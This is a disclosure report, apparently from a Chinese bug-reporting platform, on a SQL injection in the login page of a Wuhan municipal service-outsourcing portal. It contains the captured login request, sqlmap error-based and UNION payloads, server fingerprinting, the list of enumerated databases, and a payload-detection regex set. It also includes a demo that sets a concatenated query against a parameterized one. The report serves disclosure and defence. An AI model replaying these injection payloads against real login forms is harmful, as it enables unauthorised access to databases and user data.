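2015-09-06: Details reported to the vendor; awaiting vendor response
2015-09-08: CNCERT (National Internet Emergency Center) has not yet been able to reach the organization concerned; details disclosed only to the notifying bodies
2015-09-18: Details disclosed to core white hats and experts in related fields
2015-09-28: Details disclosed to regular white hats
2015-10-08: Details disclosed to intern white hats
2015-10-23: Details disclosed to the public
As per the title.
The Wuhan Service Outsourcing Public Service Platform is a comprehensive service platform for Wuhan's service outsourcing industry, hosted by the Wuhan Municipal Bureau of Commerce and co-organized by the Wuhan Service Outsourcing Association.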
http://**.**.**.**/
Vulnerable URL:
POST /Login.aspx HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Content-Length: 309
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=wcncyzv103erty55a2wuxz45

__VIEWSTATE=%2FwEPDwUKMTEyNjg2Nzk4NGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFCWlibVN1Ym1pdIo3R8s7J0XinKyOXVYq0YA%2F3%2Fr1&cookieexists=false&tbUserName=admin&tbUserPassword=admin&ibmSubmit.x=44&ibmSubmit.y=6&__EVENTVALIDATION=%2FwEWBAK0lrb7CwLyj%2FOQAgKyr5hiAuum6sECjr68jF9IgyR%2FVN6EVMRSn%2BngAbM%3D
The tbUserName parameter is vulnerable to SQL injection.
---
Parameter: tbUserName (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwUKMTEyNjg2Nzk4NGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFCWlibVN1Ym1pdIo3R8s7J0XinKyOXVYq0YA/3/r1&cookieexists=false&tbUserName=admin' AND 6844=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (6844=6844) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(113)+CHAR(120)+CHAR(113))) AND 'TNLI'='TNLI&tbUserPassword=admin&ibmSubmit.x=44&ibmSubmit.y=6&__EVENTVALIDATION=/wEWBAK0lrb7CwLyj/OQAgKyr5hiAuum6sECjr68jF9IgyR/VN6EVMRSn+ngAbM=

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: __VIEWSTATE=/wEPDwUKMTEyNjg2Nzk4NGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFCWlibVN1Ym1pdIo3R8s7J0XinKyOXVYq0YA/3/r1&cookieexists=false&tbUserName=admin' UNION ALL SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(122)+CHAR(113)+CHAR(117)+CHAR(104)+CHAR(83)+CHAR(68)+CHAR(80)+CHAR(101)+CHAR(104)+CHAR(104)+CHAR(82)+CHAR(67)+CHAR(113)+CHAR(98)+CHAR(113)+CHAR(120)+CHAR(113),NULL,NULL,NULL-- &tbUserPassword=admin&ibmSubmit.x=44&ibmSubmit.y=6&__EVENTVALIDATION=/wEWBAK0lrb7CwLyj/OQAgKyr5hiAuum6sECjr68jF9IgyR/VN6EVMRSn+ngAbM=
---
[14:03:43] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, Nginx, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
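For defenders reviewing request logs for this login form, the following added example (not part of the original report) flags the two payload shapes sqlmap reported in tbUserName. The rule names, the helper `_body` and the sample bodies are constructed for illustration; the injected samples are shortened forms of the payloads above.

```python
import re
from urllib.parse import parse_qs, urlencode

# Heuristics derived from the two payload shapes in the sqlmap output above.
RULES = {
    "quote_then_boolean": re.compile(r"'\s*(AND|OR)\b", re.I),
    "union_select": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
    "convert_int_subquery": re.compile(r"\bCONVERT\s*\(\s*INT\s*,\s*\(\s*SELECT\b", re.I),
    "char_concat_chain": re.compile(r"(CHAR\(\d+\)\s*\+\s*){3,}", re.I),
    "trailing_comment": re.compile(r"--\s*$"),
}

def inspect_login_body(body, field="tbUserName"):
    """Return the sorted rule names matched by the URL-decoded value(s) of `field`."""
    hits = set()
    for value in parse_qs(body, keep_blank_values=True).get(field, []):
        hits.update(name for name, rx in RULES.items() if rx.search(value))
    return sorted(hits)

def _body(username):
    # Constructed sample: only the two credential fields, URL-encoded as on the wire.
    return urlencode({"tbUserName": username, "tbUserPassword": "admin"})

# Constructed samples; the two injected values are shortened forms of the page's payloads.
SAMPLES = {
    "benign": _body("admin"),
    "apostrophe_name": _body("o'brien"),
    "error_based": _body("admin' AND 6844=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)"
                         "+CHAR(112)+CHAR(122)+CHAR(113))) AND 'TNLI'='TNLI"),
    "union": _body("admin' UNION ALL SELECT CHAR(113)+CHAR(118)+CHAR(112)"
                   "+CHAR(122),NULL,NULL,NULL-- "),
}

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(f"{label:16} {inspect_login_body(body) or 'clean'}")
```

These patterns are a triage aid for logs or a WAF rule set; they do not replace fixing the query itself.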
Databases:
available databases [7]:
[*] master
[*] model
[*] MQN
[*] msdb
[*] tempdb
[*] wsoa
[*] XGJWH
Filter the input.
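Input filtering is easy to bypass; binding the username as a query parameter removes the injection point altogether (in ASP.NET, a SqlCommand with SqlParameter values). The following added example is not from the original report: it uses Python's sqlite3 as a stand-in for the SQL Server back end, with a constructed four-column table and a UNION-shaped input modelled on the payload above, to show the concatenated query beside the parameterized one.

```python
import sqlite3

COLUMNS = "id, name, pw_hash, role"  # four columns, matching the UNION column count sqlmap found

def make_db():
    # Constructed in-memory table; SQLite stands in for the SQL Server 2005 back end.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, name TEXT, pw_hash TEXT, role TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'admin', 'constructed-hash', 'admin')")
    return db

def lookup_concatenated(db, username):
    # Vulnerable pattern: the value is spliced into the SQL text, so a quote ends the literal.
    sql = f"SELECT {COLUMNS} FROM users WHERE name = '{username}'"
    return db.execute(sql).fetchall()

def lookup_parameterized(db, username):
    # Hardened pattern: the value travels as a bound parameter and is never parsed as SQL.
    sql = f"SELECT {COLUMNS} FROM users WHERE name = ?"
    return db.execute(sql, (username,)).fetchall()

# Same shape as the page's UNION payload; the CHAR() chain is replaced by a literal marker.
UNION_SHAPED = "admin' UNION ALL SELECT 'marker',NULL,NULL,NULL-- "

if __name__ == "__main__":
    db = make_db()
    print("concatenated :", lookup_concatenated(db, UNION_SHAPED))
    print("parameterized:", lookup_parameterized(db, UNION_SHAPED))
```

With the concatenated query the marker row comes back alongside the real one; with the bound parameter the whole string is compared as a literal username and no row matches.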
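Severity: High
Vulnerability Rank: 11
Confirmed: 2015-09-08 19:41
CNVD has confirmed the situation described and has passed it to CNCERT, which has issued it to the Hubei branch center; the branch center will coordinate follow-up handling with the organization that manages the website.
None yet.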